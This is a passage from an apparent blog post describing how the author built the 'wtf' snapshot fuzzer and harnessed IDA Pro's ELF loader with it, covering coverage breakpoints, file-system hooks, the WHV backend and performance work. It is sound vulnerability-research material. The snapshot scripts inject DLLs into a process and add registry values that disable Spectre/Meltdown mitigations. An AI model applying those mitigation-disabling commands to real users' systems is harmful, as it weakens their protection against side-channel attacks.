The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the below invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

vtune

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv.

I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet which was nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

